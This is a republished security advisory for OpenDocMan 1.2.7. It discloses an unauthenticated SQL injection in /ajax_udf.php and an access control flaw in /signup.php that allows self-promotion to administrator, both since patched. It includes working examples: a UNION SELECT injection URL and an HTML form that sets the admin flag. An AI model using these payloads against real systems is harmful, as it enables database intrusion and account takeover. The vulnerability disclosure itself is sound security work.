OpenDocMan 1.2.7 - Multiple Vulnerabilities

2014-03-05T00:00:00
ID 1337DAY-ID-21984
Type zdt
Reporter High-Tech Bridge
Modified 2014-03-05T00:00:00

Description

OpenDocMan versions 1.2.7 and below suffer from improper access control and remote SQL injection vulnerabilities.

                                        
                                            Product: OpenDocMan
Vendor: Free Document Management Software
Vulnerable Version(s): 1.2.7 and probably prior
Tested Version: 1.2.7
Advisory Publication: February 12, 2014 [without technical details]
Vendor Notification: February 12, 2014
Vendor Patch: February 24, 2014
Public Disclosure: March 5, 2014
Vulnerability Type: SQL Injection [CWE-89], Improper Access Control [CWE-284]
CVE References: CVE-2014-1945, CVE-2014-1946
Risk Level: High
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
 
------------------------------------------------------------------------
-----------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application.
 
1) SQL Injection in OpenDocMan: CVE-2014-1945
 
The vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.
 
The exploitation example below displays version of the MySQL server:
 
http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,v
ersion%28%29,3,4,5,6,7,8,9
 
2) Improper Access Control in OpenDocMan: CVE-2014-1946
 
The vulnerability exists due to insufficient validation of allowed action in "/signup.php" script when updating userâ??s profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application.
 
The exploitation example below assigns administrative privileges for the current account:
 
<form action="http://[host]/signup.php" method="post" name="main">
<input type="hidden" name="updateuser" value="1">
<input type="hidden" name="admin" value="1">
<input type="hidden" name="id" value="[USER_ID]">
<input type="submit" name="login" value="Run">
</form>
 
------------------------------------------------------------------------
-----------------------
 
Solution:
 
Update to OpenDocMan v1.2.7.2
 
More Information:
http://www.opendocman.com/opendocman-v1-2-7-1-release/
http://www.opendocman.com/opendocman-v1-2-7-2-released/

#  0day.today [2018-01-10]  #